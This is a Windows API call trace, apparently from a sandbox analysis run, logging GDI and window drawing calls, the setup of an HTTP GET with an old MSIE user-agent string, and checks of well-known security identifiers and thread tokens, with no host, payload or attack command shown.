[0170.576] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.576] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef80 | out: lptm=0xaef80) returned 1
[0170.576] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.576] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.576] GetSystemMetrics (nIndex=6) returned 1
[0170.576] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.576] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec4c | out: lptm=0xaec4c) returned 1
[0170.576] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.576] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec84 | out: lptm=0xaec84) returned 1
[0170.576] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.576] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.576] GetSystemMetrics (nIndex=6) returned 1
[0170.576] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.576] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef48 | out: lptm=0xaef48) returned 1
[0170.576] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.576] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef80 | out: lptm=0xaef80) returned 1
[0170.576] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.576] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.576] GetSystemMetrics (nIndex=6) returned 1
[0170.576] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.576] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec4c | out: lptm=0xaec4c) returned 1
[0170.576] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.576] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec84 | out: lptm=0xaec84) returned 1
[0170.576] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.576] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.576] GetSystemMetrics (nIndex=6) returned 1
[0170.577] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.577] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef34 | out: lptm=0xaef34) returned 1
[0170.577] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.577] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef6c | out: lptm=0xaef6c) returned 1
[0170.577] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.577] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.577] GetSystemMetrics (nIndex=6) returned 1
[0170.577] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.577] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef34 | out: lptm=0xaef34) returned 1
[0170.577] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.577] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef6c | out: lptm=0xaef6c) returned 1
[0170.577] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.577] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.577] GetSystemMetrics (nIndex=6) returned 1
[0170.578] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.578] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef48 | out: lptm=0xaef48) returned 1
[0170.578] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.578] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef80 | out: lptm=0xaef80) returned 1
[0170.578] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.578] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.578] GetSystemMetrics (nIndex=6) returned 1
[0170.578] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.578] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec4c | out: lptm=0xaec4c) returned 1
[0170.578] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.578] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec84 | out: lptm=0xaec84) returned 1
[0170.578] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.578] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.578] GetSystemMetrics (nIndex=6) returned 1
[0170.578] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.578] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef48 | out: lptm=0xaef48) returned 1
[0170.578] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.578] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef80 | out: lptm=0xaef80) returned 1
[0170.578] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.578] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.578] GetSystemMetrics (nIndex=6) returned 1
[0170.578] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.579] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec4c | out: lptm=0xaec4c) returned 1
[0170.579] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.579] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec84 | out: lptm=0xaec84) returned 1
[0170.579] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.579] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.579] GetSystemMetrics (nIndex=6) returned 1
[0170.579] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.579] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef48 | out: lptm=0xaef48) returned 1
[0170.579] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.579] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef80 | out: lptm=0xaef80) returned 1
[0170.579] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.579] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.579] GetSystemMetrics (nIndex=6) returned 1
[0170.579] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.579] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec4c | out: lptm=0xaec4c) returned 1
[0170.579] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.579] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec84 | out: lptm=0xaec84) returned 1
[0170.579] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.579] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.579] GetSystemMetrics (nIndex=6) returned 1
[0170.580] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.580] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef48 | out: lptm=0xaef48) returned 1
[0170.580] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.580] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef80 | out: lptm=0xaef80) returned 1
[0170.580] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.580] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.580] GetSystemMetrics (nIndex=6) returned 1
[0170.580] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.580] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec4c | out: lptm=0xaec4c) returned 1
[0170.580] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.580] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec84 | out: lptm=0xaec84) returned 1
[0170.580] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.580] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.580] GetSystemMetrics (nIndex=6) returned 1
[0170.580] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.580] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef34 | out: lptm=0xaef34) returned 1
[0170.580] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.580] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef6c | out: lptm=0xaef6c) returned 1
[0170.580] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.580] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.580] GetSystemMetrics (nIndex=6) returned 1
[0170.582] SysReAllocStringLen (in: pbstr=0x291f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x291f388*="GET") returned 1
[0170.583] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.583] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.583] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.583] SysReAllocStringLen (in: pbstr=0x291f388*="GET", psz="GET", len=0x3 | out: pbstr=0x291f388*="GET") returned 1
[0170.583] SysReAllocStringLen (in: pbstr=0x291f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x291f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0170.583] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0xaefd0, lpdwBufferLength=0xaefd4 | out: lpBuffer=0xaefd0, lpdwBufferLength=0xaefd4) returned 1
[0170.621] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0xaefd0, dwBufferLength=0x4) returned 1
[0170.621] VirtualFree (lpAddress=0x2920000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0170.621] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2916490, cbMultiByte=3, lpWideCharStr=0xadf08, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0170.621] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.621] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.621] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.621] SysReAllocStringLen (in: pbstr=0x291f388*="GET", psz="GET", len=0x3 | out: pbstr=0x291f388*="GET") returned 1
[0170.622] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.622] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.622] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0170.622] SysReAllocStringLen (in: pbstr=0x291f388*="GET", psz="GET", len=0x3 | out: pbstr=0x291f388*="GET") returned 1
[0170.627] GetTextExtentPoint32A (in: hdc=0x6f01071a, lpString="0", c=1, psizl=0xaf0c4 | out: psizl=0xaf0c4) returned 1
[0170.627] IsIconic (hWnd=0x1001a8) returned 0
[0170.627] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaf0c4 | out: lpRect=0xaf0c4) returned 1
[0170.627] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.627] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.627] IsIconic (hWnd=0x1001a8) returned 0
[0170.627] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaf00c | out: lpRect=0xaf00c) returned 1
[0170.627] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.627] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.627] IsIconic (hWnd=0x1001a8) returned 0
[0170.627] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.627] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.628] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.628] IsIconic (hWnd=0x1001a8) returned 0
[0170.628] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.628] FlatSB_SetScrollProp (param_1=0x1001a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0170.628] GetSysColor (nIndex=20) returned 0xffffff
[0170.628] FlatSB_SetScrollProp (param_1=0x1001a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0170.628] FlatSB_SetScrollInfo (param_1=0x1001a8, code=0, psi=0xaf01a, fRedraw=1) returned 0
[0170.628] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.628] IsIconic (hWnd=0x1001a8) returned 0
[0170.628] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.628] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.628] IsIconic (hWnd=0x1001a8) returned 0
[0170.628] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.628] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.628] IsIconic (hWnd=0x1001a8) returned 0
[0170.628] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.628] FlatSB_SetScrollProp (param_1=0x1001a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0170.628] GetSysColor (nIndex=20) returned 0xffffff
[0170.628] FlatSB_SetScrollProp (param_1=0x1001a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0170.628] FlatSB_SetScrollInfo (param_1=0x1001a8, code=1, psi=0xaf01a, fRedraw=1) returned 0
[0170.628] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.628] IsIconic (hWnd=0x1001a8) returned 0
[0170.628] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.628] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.628] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.629] IsIconic (hWnd=0x1001a8) returned 0
[0170.629] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaf00c | out: lpRect=0xaf00c) returned 1
[0170.629] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.629] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.629] IsIconic (hWnd=0x1001a8) returned 0
[0170.629] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.629] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.629] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.629] IsIconic (hWnd=0x1001a8) returned 0
[0170.629] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.629] FlatSB_SetScrollProp (param_1=0x1001a8, index=0x200, newValue=0x0, param_4=0) returned 0
[0170.629] GetSysColor (nIndex=20) returned 0xffffff
[0170.629] FlatSB_SetScrollProp (param_1=0x1001a8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0170.629] FlatSB_SetScrollInfo (param_1=0x1001a8, code=0, psi=0xaf01a, fRedraw=1) returned 0
[0170.629] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.629] IsIconic (hWnd=0x1001a8) returned 0
[0170.629] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.629] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.629] IsIconic (hWnd=0x1001a8) returned 0
[0170.629] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.629] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.629] IsIconic (hWnd=0x1001a8) returned 0
[0170.629] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.629] FlatSB_SetScrollProp (param_1=0x1001a8, index=0x100, newValue=0x0, param_4=0) returned 0
[0170.629] GetSysColor (nIndex=20) returned 0xffffff
[0170.629] FlatSB_SetScrollProp (param_1=0x1001a8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0170.629] FlatSB_SetScrollInfo (param_1=0x1001a8, code=1, psi=0xaf01a, fRedraw=1) returned 0
[0170.630] GetWindowLongA (hWnd=0x1001a8, nIndex=-16) returned 116326400
[0170.630] IsIconic (hWnd=0x1001a8) returned 0
[0170.630] GetClientRect (in: hWnd=0x1001a8, lpRect=0xaefdc | out: lpRect=0xaefdc) returned 1
[0170.630] GetCurrentThreadId () returned 0x518
[0170.630] ConvertSidToStringSidA () returned 0x1
[0170.630] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.630] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0170.630] LocalFree (hMem=0x226f40) returned 0x0
[0170.630] LocalFree (hMem=0x212f90) returned 0x0
[0170.630] ConvertStringSidToSidA () returned 0x1
[0170.630] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2912914, pSourceSid=0x212f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2912914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.630] IsValidSid (pSid=0x2912914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.630] ConvertSidToStringSidA () returned 0x1
[0170.630] LocalFree (hMem=0x226f40) returned 0x0
[0170.630] LocalFree (hMem=0x212f90) returned 0x0
[0170.630] ConvertStringSidToSidA () returned 0x1
[0170.630] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291702c, pSourceSid=0x212f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x291702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.630] IsValidSid (pSid=0x291702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.630] ConvertSidToStringSidA () returned 0x1
[0170.630] LocalFree (hMem=0x226f40) returned 0x0
[0170.630] LocalFree (hMem=0x212f90) returned 0x0
[0170.630] ConvertStringSidToSidA () returned 0x1
[0170.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291f5a0, pSourceSid=0x212f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x291f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.631] IsValidSid (pSid=0x291f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0170.631] ConvertSidToStringSidA () returned 0x1
[0170.631] LocalFree (hMem=0x226f40) returned 0x0
[0170.631] LocalFree (hMem=0x212f90) returned 0x0
[0170.631] ConvertStringSidToSidA () returned 0x1
[0170.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291f614, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.631] IsValidSid (pSid=0x291f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0170.631] ConvertSidToStringSidA () returned 0x1
[0170.631] LocalFree (hMem=0x226f58) returned 0x0
[0170.631] LocalFree (hMem=0x226f40) returned 0x0
[0170.631] ConvertStringSidToSidA () returned 0x1
[0170.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291f688, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x291f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0170.631] IsValidSid (pSid=0x291f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0170.631] ConvertSidToStringSidA () returned 0x1
[0170.631] LocalFree (hMem=0x226f58) returned 0x0
[0170.631] LocalFree (hMem=0x226f40) returned 0x0
[0170.631] ConvertStringSidToSidA () returned 0x1
[0170.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291f6fc, pSourceSid=0x226f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x291f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0170.631] IsValidSid (pSid=0x291f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0170.631] ConvertSidToStringSidA () returned 0x1
[0170.631] LocalFree (hMem=0x21c1c8) returned 0x0
[0170.631] LocalFree (hMem=0x226f58) returned 0x0
[0170.631] ConvertStringSidToSidA () returned 0x1
[0170.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291f770, pSourceSid=0x226f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x291f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0170.631] IsValidSid (pSid=0x291f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0170.631] ConvertSidToStringSidA () returned 0x1
[0170.631] LocalFree (hMem=0x21c1c8) returned 0x0
[0170.631] LocalFree (hMem=0x226f70) returned 0x0
[0170.631] ConvertStringSidToSidA () returned 0x1
[0170.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291f7f8, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x291f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0170.631] IsValidSid (pSid=0x291f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0170.631] ConvertSidToStringSidA () returned 0x1
[0170.631] LocalFree (hMem=0x21c1c8) returned 0x0
[0170.631] LocalFree (hMem=0x226f40) returned 0x0
[0170.631] ConvertStringSidToSidA () returned 0x1
[0170.631] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291f880, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x291f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0170.632] IsValidSid (pSid=0x291f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0170.632] ConvertSidToStringSidA () returned 0x1
[0170.632] LocalFree (hMem=0x226f58) returned 0x0
[0170.632] LocalFree (hMem=0x226f40) returned 0x0
[0170.632] ConvertStringSidToSidA () returned 0x1
[0170.632] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291f90c, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x291f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0170.632] IsValidSid (pSid=0x291f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0170.632] ConvertSidToStringSidA () returned 0x1
[0170.632] LocalFree (hMem=0x226f58) returned 0x0
[0170.632] LocalFree (hMem=0x226f40) returned 0x0
[0170.632] ConvertStringSidToSidA () returned 0x1
[0170.632] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x291f998, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x291f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0170.632] IsValidSid (pSid=0x291f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0170.632] ConvertSidToStringSidA () returned 0x1
[0170.632] LocalFree (hMem=0x226f58) returned 0x0
[0170.632] LocalFree (hMem=0x226f40) returned 0x0
[0170.632] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0170.632] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0170.632] GetCurrentThread () returned 0xfffffffe
[0170.632] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0170.632] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0170.632] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0xae89c | out: TokenHandle=0xae89c*=0x27f3756) returned 0
[0170.632] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
